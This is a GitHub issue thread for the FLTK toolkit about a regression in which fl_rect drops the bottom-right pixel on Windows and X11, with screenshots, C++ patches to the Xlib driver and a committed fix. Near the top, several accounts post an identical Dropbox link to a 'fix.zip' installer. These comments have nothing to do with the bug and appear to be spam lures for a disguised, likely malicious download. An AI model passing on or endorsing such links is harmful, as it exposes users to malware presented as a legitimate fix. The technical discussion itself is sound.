### ISSUE TITLE
[Regression] Windows and X11: FL_BORDER_BOX / fl_rect missing bottom-right pixel

### ISSUE THREAD

**Issue by dannye** [fltk/fltk#1052]
**Describe the bug**

On Windows and X11, fl_rect does not include the bottom-right pixel, just like the issue from FLTK 1.3. I have pinned the issue down to being caused by commit 3cc12d2.
This issue is not present on Mac, and I did not test Wayland.

**To Reproduce**

1. Build like normal on Windows or X11
2. Run test/boxtype
3. Look at the button for FL_BORDER_BOX and see that it is missing the bottom-right pixel

**Expected behavior**

fl_rect should draw a full rectangle under ordinary conditions.

**Screenshots**

Commit 3cc12d2: 

![image](https://github.com/user-attachments/assets/4b156675-ce3a-478f-ab61-5712ce8b6fc0)

Previous commit, 467866b:

![image](https://github.com/user-attachments/assets/6ed083d2-4d3b-4f56-b5b4-63e27213ecf5)

**FLTK Version**
 - Version: 1.4.0
 - Downloaded and self-built from: Git
 - If from Git, branch: master
 - If from Git, commit: 3cc12d2 and later

**FLTK Configure / Build Options**
 - cmake -D CMAKE_BUILD_TYPE=Release

**Operating System / Platform:**
 - OS: Linux, Windows
 - OS Version: Peppermint OS 10, Windows 11
 - Processor if relevant: Intel

**Linux/Unix Runtime, if applicable:**
 - X11

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by ManoloFLTK** [comment]
I don't see any missing pixel under X11 (using either X11 or Cairo graphics) nor under Wayland when using today's git source code.

**Comment by ManoloFLTK** [comment]
I also see what you report under Windows 11 when I turn the HighDPI screen to 100% (instead of 200%). Rectangle drawing should now be fixed with the commit mentioned above.

@dannye Do you confirm?

**Comment by dannye** [comment]
> The screenshots posted above contain blurred lines.

No they do not.

The screenshots above show a regular, 1 pixel thick rectangle, as a PNG with no artifacts/lossy compression/blurred lines. Here is the same screenshot, redownloaded directly from github, opened in GIMP and zoomed at 4500%:

![image](https://github.com/user-attachments/assets/bcf9e93b-58fa-44c8-930a-8cf98612ff7b)

> What system scaling and FLTK scaling was in use?

None.

(This is what I meant by "fl_rect should draw a full rectangle under ordinary conditions." -- an ordinary, 1 pixel thick, unscaled rectangle.)

> I also see what you report under Windows 11 when I turn the HighDPI screen to 100% (instead of 200%). Rectangle drawing should now be fixed with the commit mentioned above.
> 
> @dannye Do you confirm?

Yes, it looks fixed on Windows for me. I didn't look at the code, but can the same logic apply to the Xlib graphics driver? The same commit (3cc12d2) created the same side effect for both Windows and X11.

**Comment by wcout** [comment]
Regarding the Xlib (driver) bug:

I also can see it under my Ubuntu 20.04 machine.
Interestingly when I replace the  `XDrawRectangle`  with `XDrawLines`, **when using the bottom right edge as start**, there is no missing pixel:

````diff
diff --git a/src/drivers/Xlib/Fl_Xlib_Graphics_Driver_rect.cxx b/src/drivers/Xlib/Fl_Xlib_Graphics_Driver_rect.cxx
index 689f0eccf..749bb0a0f 100644
--- a/src/drivers/Xlib/Fl_Xlib_Graphics_Driver_rect.cxx
+++ b/src/drivers/Xlib/Fl_Xlib_Graphics_Driver_rect.cxx
@@ -228,7 +228,15 @@ void Fl_Xlib_Graphics_Driver::focus_rect(int x, int y, int w, int h) {
 }
 
 void Fl_Xlib_Graphics_Driver::rect_unscaled(int x, int y, int w, int h) {
-  XDrawRectangle(fl_display, fl_window, gc_, x, y, w, h);
+  XPoint p[5];
+  p[0].x = x + w; p[0].y = y + h;
+  p[1].x = x;     p[1].y = y + h;
+  p[2].x = x;     p[2].y = y;
+  p[3].x = x + w; p[3].y = y;
+  p[4].x = x + w; p[4].y = y + h;
+
+//  XDrawRectangle(fl_display, fl_window, gc_, x, y, w, h);
+  XDrawLines(fl_display, fl_window, gc_, p, 5, 0);
 }
 ````
(When drawing the `XDrawLines` starting with top/left there is a missing pixel on bottom/right.)

**Comment by ManoloFLTK** [comment]
My problem is that I see no missing pixel here with the X11 rectangle:
<img width="198" alt="image" src="https://github.com/user-attachments/assets/b168d4d0-fb1b-446c-a38a-19684314b322">

I tried both 100% and 200% scales and both Wayland and Xorg desktops.

**Comment by dannye** [comment]
That border has a thickness of 2:

![image](https://github.com/user-attachments/assets/8c30887d-4479-4fdc-ab94-6946bf0b5326)

I'm not doubting you, but are you certain that you don't see the issue even when the border has a thickness of 1 instead?

**Comment by ManoloFLTK** [comment]
Yes, I'm sure: I tried both 100% and 200% scales producing 1-pixel and 2-pixel lines, respectively. Here is what I get at 100%:
<img width="101" alt="image" src="https://github.com/user-attachments/assets/680ce16a-c235-4633-9da0-11bfea72ee46">

**Comment by ManoloFLTK** [comment]
Could you try with this hack?
```
void Fl_Xlib_Graphics_Driver::rect_unscaled(int x, int y, int w, int h) {
  XDrawRectangle(fl_display, fl_window, gc_, x, y, w, h);
  int width = line_width_ > 0 ? line_width_ : 1;
  XFillRectangle(fl_display, fl_window, gc_, x+w-width/2, y+h-width/2, width, width); // #1052
}

```

**Comment by ManoloFLTK** [comment]
What do you see (without hack) if you scale up with ctrl-+ the boxtype app to 200% ?

**Comment by wcout** [comment]
Just a reminder ... all this has been discussed extensively there: https://github.com/fltk/fltk/issues/156

**Comment by dannye** [comment]
Without the hack, 100%:

![image](https://github.com/user-attachments/assets/430f5822-fa55-4dc8-9eb4-4a0e98f3d48b)

Without the hack, 200%:

![image](https://github.com/user-attachments/assets/0f334c5c-a2c5-4ea3-9afe-5807054216f3)

With the hack, 100%:

![image](https://github.com/user-attachments/assets/557963b8-77b4-48c7-a9ba-a9ba260bbdfd)

With the hack, 200%:

![image](https://github.com/user-attachments/assets/d6071689-ebe8-45d2-bab0-e866af92885c)

**Comment by wcout** [comment]
@ManoloFLTK This hack will not work with the different join types (as can be seen with the `line_style` demo).

**Comment by ManoloFLTK** [comment]
Thanks @wcout for the pointer to #156. It's a long thing that boils down to: that's a bug in the default X11 driver of some Linux boxes that's fixed by using Intel's driver and also by replacing the default line width of 0 by 1. But, this line width change slows down rectangle drawing.

My view on this is: move to more modern graphics; there are 2 versions of it
- X11 + Cairo : build with -D FLTK_GRAPHICS_CAIRO=1 -D FLTK_BACKEND_WAYLAND=0
- hybrid Wayland/X11 (which uses Cairo) : default FLTK 1.4 Build

**Comment by ManoloFLTK** [comment]
This other approach might be what we need:
```
void Fl_Xlib_Graphics_Driver::rect_unscaled(int x, int y, int w, int h) {
  void *old = NULL;
  if (line_width_ == 0) old = change_pen_width(1); // #156, #1052
  XDrawRectangle(fl_display, fl_window, gc_, x, y, w, h);
  if (old) reset_pen_width(old);
}
```
@dannye Does it fix the issue for you?

**Comment by dannye** [comment]
@ManoloFLTK Yes, that fixes it for me.

**Comment by dannye** [comment]
FWIW, I did confirm that my Linux setup is using the modesetting driver (the problem, according to #156) and not the intel driver:

```
$ inxi -G
Graphics:  Card: Intel HD Graphics 620
           Display Server: x11 (X.Org 1.20.8 ) drivers: modesetting (unloaded: fbdev,vesa)
           Resolution: 1920x1080@60.00hz, 1920x1080@60.00hz
           OpenGL: renderer: Mesa DRI Intel HD Graphics 620 (KBL GT2) version: 4.6 Mesa 20.0.8
```

**Comment by dannye** [comment]
Enabling Cairo with X11 also fixed the bottom-right pixel issue, without introducing any other negative side effects afaict.

Cairo on X11 also has the added benefit of completely fixing FL_DOT / FL_DASH line style drawing which has always been really poor on X11 w/o Cairo in my experience (originally reported in #735).

Without Cairo:

![image](https://github.com/user-attachments/assets/a9633f7a-c78e-4827-b95f-96dc5cba6c7b)

![image](https://github.com/user-attachments/assets/3976affd-bb1b-4f45-8acb-c74d387267d1)

With Cairo:

![image](https://github.com/user-attachments/assets/3899f9c3-db82-431d-aba4-140a514b499e)

![image](https://github.com/user-attachments/assets/e8a0265a-82a6-447f-9fe8-c9e6838a1619)

**Comment by ManoloFLTK** [comment]
@dannye  The fix above with function change_pen_width() is now committed. I propose you close the issue if you agree.

**Comment by dannye** [comment]
Absolutely :+1: Thank you very much!

**Comment by dannye** [comment]
Just coming back to say FTR that I only just now noticed that 008d71f also fixed the dotted/dashed line style problem in my previous screenshots. I thought it was only intended to fix the missing bottom-right pixel, but it fixed both issues which I thought was very surprising! Thanks again.
